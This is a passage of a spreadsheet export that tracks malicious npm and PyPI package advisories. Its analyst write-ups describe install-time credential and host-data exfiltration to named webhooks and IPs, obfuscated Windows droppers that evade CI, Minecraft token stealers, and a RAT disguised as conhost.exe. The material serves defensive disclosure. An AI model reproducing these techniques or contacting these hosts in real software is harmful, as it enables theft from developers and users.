## Source: ghsa-malware (fdaf333e613f70df12ceaf378093d996a4bc1dd4df1a6350c4848a5de0fb83e7)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85" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17222</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>GHSA-pm4h-xrhq-vh62</t>
        </is>
      </c>
      <c r="D386" s="5" t="inlineStr"/>
      <c r="E386" s="5" t="inlineStr"/>
      <c r="F386" s="5" t="inlineStr"/>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="inlineStr"/>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K386" s="5" t="inlineStr"/>
      <c r="L386" s="5" t="inlineStr">
        <is>
          <t>npm:kalasnik-npm-simple-test</t>
        </is>
      </c>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q386" s="5" t="inlineStr"/>
      <c r="R386" s="5" t="inlineStr"/>
      <c r="S386" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f1463688412306d5d6f791bb036bea59aeb7251a3044a52c57119768f27cd463)
The package's postinstall script send_data.js runs automatically on npm install. It reads C:\temp\test.txt from the installer's filesystem and POSTs the contents over plain HTTP to a hardcoded remote endpoint at 35.178.197.251:8080. Package metadata ("Simplified test", author "Purple", UNLICENSED) is consistent with a PoC exfiltration harness rather than a legitimate library.
## Source: ghsa-malware (892887d57c2d036af7c30a0a27995006f042229dd0959c7653a5560054277cbe)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86" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17206</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>GHSA-pqvc-prrc-mv45</t>
        </is>
      </c>
      <c r="D387" s="5" t="inlineStr"/>
      <c r="E387" s="5" t="inlineStr"/>
      <c r="F387" s="5" t="inlineStr"/>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="inlineStr"/>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K387" s="5" t="inlineStr"/>
      <c r="L387" s="5" t="inlineStr">
        <is>
          <t>npm:uuid-date</t>
        </is>
      </c>
      <c r="M387" s="5" t="inlineStr"/>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q387" s="5" t="inlineStr"/>
      <c r="R387" s="5" t="inlineStr"/>
      <c r="S387" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (1794c1dba5ffb902f0c8011a60990baff7cf5ebc1f90ab634937734944696995)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87" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17210</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>GHSA-pv7p-ghgv-268x</t>
        </is>
      </c>
      <c r="D388" s="5" t="inlineStr"/>
      <c r="E388" s="5" t="inlineStr"/>
      <c r="F388" s="5" t="inlineStr"/>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="inlineStr"/>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K388" s="5" t="inlineStr"/>
      <c r="L388" s="5" t="inlineStr">
        <is>
          <t>npm:img-to-native</t>
        </is>
      </c>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q388" s="5" t="inlineStr"/>
      <c r="R388" s="5" t="inlineStr"/>
      <c r="S388" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7676788d88c2194b8d5c048decfbe06550798ce342af54f8975bc26422d10c53)
On require() of img-to-native, index.js reads banner.jpg from the.cache directory of its sole dependency cdn-img-fetch, locates a payload appended after the PNG IEND marker, base64-decodes it, and AES-256-CBC decrypts it using a key derived from sha256('nif-runtime-2027'). The decrypted bytes are written to %LOCALAPPDATA%\Programs\NodeRuntime\node_runtime_helper.exe with mode 0o755, and the source image is then unlinked. An fs.watch fallback waits for the image to appear if it is not yet staged. The payload is obfuscated (hidden after a PNG end-of-image marker, base64-encoded, AES-encrypted), unverified (no hash or signature check), and dropped to a persistence-adjacent path with executable bits set. The advertised purpose ("convert image files to native binary representation") does not require decrypting content appended after a PNG IEND chunk to materialize a Windows executable. The companion package cdn-img-fetch is pinned as a caret range (^1.0.0), so future 1.x releases can silently change the delivered payload bytes. Installing or loading this package results in attacker-controlled code being written to the installer's filesystem with execute permission.
## Source: ghsa-malware (7131e9cb1bdeb272ae7e26f2877087fd5da8716ef7c08e0fc0bf1359e278df8e)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88" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17216</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>GHSA-w4g6-rgx4-2wjf</t>
        </is>
      </c>
      <c r="D389" s="5" t="inlineStr"/>
      <c r="E389" s="5" t="inlineStr"/>
      <c r="F389" s="5" t="inlineStr"/>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="inlineStr"/>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K389" s="5" t="inlineStr"/>
      <c r="L389" s="5" t="inlineStr">
        <is>
          <t>npm:my-skibidi</t>
        </is>
      </c>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q389" s="5" t="inlineStr"/>
      <c r="R389" s="5" t="inlineStr"/>
      <c r="S389" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (02c4b3433d9f819c70b6ec69fe7bcc0ae0a7ff48540e11394ea5fb8f3c49049c)
my-skibidi@1.0.2 contains top-level code in its main module that unconditionally POSTs `document.cookie` to the hardcoded remote endpoint https://c-b34596407b6d47d6.dgactf-challs.site/addPost via a `sendPost(...)` call. Any downstream web application that bundles this package will, when loaded in a user's browser, transmit that user's cookies and session data to the external host. The destination is not a first-party service and is not caller-configurable; the exfiltration runs as a side effect of loading the module. The package's declared functionality does not require reading or transmitting cookies, and no consent gate or configuration controls the behavior.
## Source: ghsa-malware (47126398a61b320eb7bbad1b71461843e4609e46f5137d735ea3d15d976c7f46)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89" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17217</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17213</t>
        </is>
      </c>
      <c r="D390" s="5" t="inlineStr"/>
      <c r="E390" s="5" t="inlineStr"/>
      <c r="F390" s="5" t="inlineStr"/>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="inlineStr"/>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K390" s="5" t="inlineStr"/>
      <c r="L390" s="5" t="inlineStr">
        <is>
          <t>PyPI:azure-langchain-example</t>
        </is>
      </c>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q390" s="5" t="inlineStr"/>
      <c r="R390" s="5" t="inlineStr"/>
      <c r="S390" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1cffc3a51858b1b7a17ff0edfd2eeae6383e83b4eff5bc078f7b1d4f5ba36ad2)
On `import azure_langchain_example`, the package's __init__.py starts a background daemon thread that issues a GET request to https://litellm.adversarylabx.com/.telemetry with the installer's hostname, resolved IP address, a timestamp, and the package name in the query string, using urllib.request.urlopen with a short timeout and silenced exceptions. The destination host is unrelated to the package's advertised purpose (a minimal LangChain wrapper for Azure OpenAI) and to any Azure or LangChain publisher domain. The behavior fires unconditionally at import without user consent or opt-out and is not mentioned in the README. Package metadata is placeholder (`Your Name &lt;you@example.com&gt;`) and the name resembles the Azure+LangChain ecosystem, consistent with a lookalike used to profile installers who mistype or guess an Azure/LangChain integration package name. An in-source comment labeling the request a harmless canary is author-controlled text that does not change the observed behavior.
## Source: kam193 (59c10650dde5db077b435212025a4cb48ab69daf76022cb932dfec98beea4479)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390" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17213</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17214</t>
        </is>
      </c>
      <c r="D391" s="5" t="inlineStr"/>
      <c r="E391" s="5" t="inlineStr"/>
      <c r="F391" s="5" t="inlineStr"/>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="inlineStr"/>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K391" s="5" t="inlineStr"/>
      <c r="L391" s="5" t="inlineStr">
        <is>
          <t>npm:git-en-boite-logging</t>
        </is>
      </c>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q391" s="5" t="inlineStr"/>
      <c r="R391" s="5" t="inlineStr"/>
      <c r="S391" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f6ebee9f4428d7f14f6f941438064715c8bece34c5fe6bfedf32bbd8cba226c0)
package.json declares a preinstall lifecycle hook that runs `wget` to a hardcoded webhook.site collector URL (https://webhook.site/3fcfa5af-1b4e-4556-9d48-26190d02795f/), passing `$(whoami)`, `$(hostname)`, and `$(pwd)` as query parameters. On `npm install`, npm invokes the preinstall script automatically, so the installer's OS username, host name, and current working directory are transmitted to an anonymous third-party webhook collector without any user action. This is the canonical dependency-confusion / reconnaissance beacon shape: an otherwise-empty package whose only on-install effect is to phone home installer identity to an attacker-chosen endpoint, typically used to confirm ingress into a target's internal build environment before staging a follow-on payload.
</t>
        </is>
      </c>
      <c r="T391" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17214</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17215</t>
        </is>
      </c>
      <c r="D392" s="5" t="inlineStr"/>
      <c r="E392" s="5" t="inlineStr"/>
      <c r="F392" s="5" t="inlineStr"/>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="inlineStr"/>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr">
        <is>
          <t>npm, eslint, go, gin</t>
        </is>
      </c>
      <c r="K392" s="5" t="inlineStr"/>
      <c r="L392" s="5" t="inlineStr">
        <is>
          <t>npm:eslint-plugin-skywagon-web</t>
        </is>
      </c>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q392" s="5" t="inlineStr"/>
      <c r="R392" s="5" t="inlineStr"/>
      <c r="S392" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (3c5d134d2e79b24ed65d2998520db05b5cc86b251ae579a6d8cec6d8fe02340f)
eslint-plugin-skywagon-web@100.0.0 ships an index.js that is executed via a preinstall lifecycle script on `npm install`. The script collects installer-side identifiers — os.hostname(), os.userInfo().username, os.homedir(), process.cwd(), dns.getServers(), and the contents of the package's package.json — and POSTs them over HTTPS to the hardcoded external collector eo1blcdjptwydyq.m.pipedream.net. A source comment ("replace burpcollaborator.net with Interactsh or pipedream") shows the file is a dependency-confusion exfiltration template repurposed as a live payload. The implausibly high version number (100.0.0) is consistent with a dependency-confusion lure intended to override an internal package of the same name during resolution.
</t>
        </is>
      </c>
      <c r="T392" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17215</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17223</t>
        </is>
      </c>
      <c r="D393" s="5" t="inlineStr"/>
      <c r="E393" s="5" t="inlineStr"/>
      <c r="F393" s="5" t="inlineStr"/>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="inlineStr"/>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K393" s="5" t="inlineStr"/>
      <c r="L393" s="5" t="inlineStr">
        <is>
          <t>npm:chalk-figlet</t>
        </is>
      </c>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q393" s="5" t="inlineStr"/>
      <c r="R393" s="5" t="inlineStr"/>
      <c r="S393" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (66dfb43d5f4ae643e32497447293c12170a21f258a7e7d3d07e8f90f2119e13b)
package.json declares a postinstall script (`node example.js`) that requires index.js at install time. index.js contains a function named `_syncTelemetry` that decodes a hex-obfuscated URL (`Buffer.from('687474703a...','hex')` -&gt; `http://104.234.65.75:700/setup.exe`) and a hex-obfuscated filename (`RuntimeBroker.exe`), downloads the binary over plain HTTP from a bare IP using `axios.get(..., {responseType:'stream'})` piped to `fs.createWriteStream` in `os.tmpdir()`, and executes it via `child_process.exec` with `windowsHide: true`. Execution is gated on `process.env.npm_lifecycle_event` so it fires during `npm install`. The dropped filename impersonates the legitimate Windows system binary RuntimeBroker.exe, and the package presents itself as a chalk+figlet wrapper unrelated to the observed behavior.
</t>
        </is>
      </c>
      <c r="T393" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17223</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17224</t>
        </is>
      </c>
      <c r="D394" s="5" t="inlineStr"/>
      <c r="E394" s="5" t="inlineStr"/>
      <c r="F394" s="5" t="inlineStr"/>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="inlineStr"/>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K394" s="5" t="inlineStr"/>
      <c r="L394" s="5" t="inlineStr">
        <is>
          <t>npm:fabric-asset-pipeline</t>
        </is>
      </c>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q394" s="5" t="inlineStr"/>
      <c r="R394" s="5" t="inlineStr"/>
      <c r="S394" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (bb92787d766d5bfa0c384cc04909689215fa0d3e869630422caa8bedd303038a)
fabric-asset-pipeline@1.0.0 declares a postinstall hook that runs index.js on npm install. index.js is heavily obfuscated (obfuscator.io-style rotated string array plus base64+RC4 decoding of identifiers and URLs, with newline/regex anti-formatting hooks) and implements a Minecraft credential stealer: functions stealLauncherAccounts(), stealAltLaunchers(), and readSessionDump() read account credential stores from the official Minecraft launcher (launcher_accounts.json / launcher_profiles.json) as well as Prism/MultiMC, TLauncher, Modrinth, PolyMC, and GDLauncher, plus a session dump from the OS temp directory. Extracted account names, access tokens, and refresh tokens are POSTed via https.request to a hardcoded webhook whose URL is RC4-decoded at runtime. A companion sendInfo() call ships os.hostname(), os.userInfo().username, os.platform()/os.release(), and the recovered Minecraft username to the same endpoint. None of this behavior is part of the package's advertised 'asset loader bridge' purpose, and the obfuscation deliberately conceals both the exfiltration functions and the destination URL.
</t>
        </is>
      </c>
      <c r="T394" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17224</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17225</t>
        </is>
      </c>
      <c r="D395" s="5" t="inlineStr"/>
      <c r="E395" s="5" t="inlineStr"/>
      <c r="F395" s="5" t="inlineStr"/>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="inlineStr"/>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K395" s="5" t="inlineStr"/>
      <c r="L395" s="5" t="inlineStr">
        <is>
          <t>npm:fabric-render-bridge</t>
        </is>
      </c>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q395" s="5" t="inlineStr"/>
      <c r="R395" s="5" t="inlineStr"/>
      <c r="S395" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c2715ef0b07fbf0ca24fb8dadec44f2fcfdc273421a49ad2201bf8e40d3e2c01)
package.json declares postinstall="node index.js", so `npm install fabric-render-bridge` automatically executes index.js. index.js reads Minecraft launcher credential stores across multiple launchers (launcher_accounts.json and launcher_profiles.json for the official launcher, PrismLauncher, MultiMC, TLauncher, Modrinth, PolyMC, GDLauncher) plus a session dump from the OS temp directory, extracts accessToken/refreshToken values and account usernames, and POSTs them via https.request to a hardcoded Discord webhook at discord.com/api/webhooks/1554065488726990909/. A separate sendInfo() routine POSTs os.hostname(), os.userInfo().username, os.platform() and os.release() to the same webhook on every install. The package presents itself as a Fabric render bridge but ships no rendering functionality; its sole install-time behavior is credential and host-identity theft.
</t>
        </is>
      </c>
      <c r="T395" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17225</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17226</t>
        </is>
      </c>
      <c r="D396" s="5" t="inlineStr"/>
      <c r="E396" s="5" t="inlineStr"/>
      <c r="F396" s="5" t="inlineStr"/>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="inlineStr"/>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K396" s="5" t="inlineStr"/>
      <c r="L396" s="5" t="inlineStr">
        <is>
          <t>npm:figlet-chalk-render</t>
        </is>
      </c>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q396" s="5" t="inlineStr"/>
      <c r="R396" s="5" t="inlineStr"/>
      <c r="S396" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (992cf49b88be09149971d4ac18fe2a4b61d242186f553cb3283a26970b886d7f)
The package is advertised as a chalk+figlet wrapper but index.js contains a top-level IIFE that runs on require. On Windows hosts, it reconstructs the module names 'https', 'os', 'fs', 'path', and 'child_process' and the method name 'spawn' from char-code arrays, hex escapes, and string concatenation to hide the network and execution chain. It then decodes the hardcoded plain-HTTP URL http://104.234.65.75:700/setup.exe and the filename RuntimeBroker.exe (masquerading as a legitimate Windows binary), downloads the payload into the OS temp directory via https.get piped to createWriteStream, and spawns it detached with windowsHide: true and.unref(). Execution is gated to skip environments where CI, SANDBOX, GITHUB_ACTIONS, or TRAVIS are set, evading sandbox and CI analysis. The obfuscation, bare-IP plain-HTTP delivery, RuntimeBroker.exe masquerade, and CI-evasion gate are inconsistent with the package's stated purpose and match an install/require-time Windows dropper.
</t>
        </is>
      </c>
      <c r="T396" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17226</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17227</t>
        </is>
      </c>
      <c r="D397" s="5" t="inlineStr"/>
      <c r="E397" s="5" t="inlineStr"/>
      <c r="F397" s="5" t="inlineStr"/>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="inlineStr"/>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K397" s="5" t="inlineStr"/>
      <c r="L397" s="5" t="inlineStr">
        <is>
          <t>npm:nebula-llm</t>
        </is>
      </c>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q397" s="5" t="inlineStr"/>
      <c r="R397" s="5" t="inlineStr"/>
      <c r="S397" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b33da6aef41209f654f8f76cc56074a7b827599f42f941e3917326da1f4d2566)
The npm package nebula-llm@1.0.0 ships a preinstall lifecycle script (preinstall.cjs) that embeds a ~257KB Windows PE binary as a base64+zlib-compressed string literal. On `npm install` on Windows, the script decompresses the blob, writes it to %LOCALAPPDATA%\Microsoft\Conhost\conhost.exe — impersonating the legitimate Windows Console Host binary — and spawns it detached with stdio ignored and windowsHide:true, then unrefs the child so it survives the install process. The decoded PE contains a.kntrat section and references github.com/syskiel/kntrat-e and IP 65.87.7.132, consistent with a persistent remote-access implant. Installation therefore executes an opaque author-supplied executable on the installer's host with no user interaction and no purpose related to any documented package function.
</t>
        </is>
      </c>
      <c r="T397" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17227</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17228</t>
        </is>
      </c>
      <c r="D398" s="5" t="inlineStr"/>
      <c r="E398" s="5" t="inlineStr"/>
      <c r="F398" s="5" t="inlineStr"/>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="inlineStr"/>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K398" s="5" t="inlineStr"/>
      <c r="L398" s="5" t="inlineStr">
        <is>
          <t>npm:nebulaai-sdk</t>
        </is>
      </c>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q398" s="5" t="inlineStr"/>
      <c r="R398" s="5" t="inlineStr"/>
      <c r="S398" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (dc906b81107141fbd85dcabf89fd2f5112c4e4a134045c90d6a35abb4b67d16e)
The package's `preinstall.js` contains a base64+zlib-encoded 257 KB Windows PE executable. On `npm install` on Windows, the script decodes the blob and writes it to `%LOCALAPPDATA%\Microsoft\Conhost\conhost.exe` — a path and filename that impersonates a legitimate Windows console host binary — then spawns it via `child_process.spawn` with `detached: true`, `stdio: 'ignore'`, and `windowsHide: true`, so execution is silent and survives the npm process. The decoded PE contains a section named `.kntrat` and references the external host `65.87.7.132` and the repository `github.com/syskiel/kntrat-e`, indicating remote command-and-control functionality (RAT-shaped naming). The package has no legitimate SDK functionality visible; the preinstall hook exists solely to stage and run the embedded executable. Installing this package on a Windows host results in full arbitrary code execution under the installing user, with a masqueraded persistent binary staged under LOCALAPPDATA and a C2 endpoint reachable at 65.87.7.132.
</t>
        </is>
      </c>
      <c r="T398" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17228</t>
        </is>
      </c>
    </row>
    <row r="399">
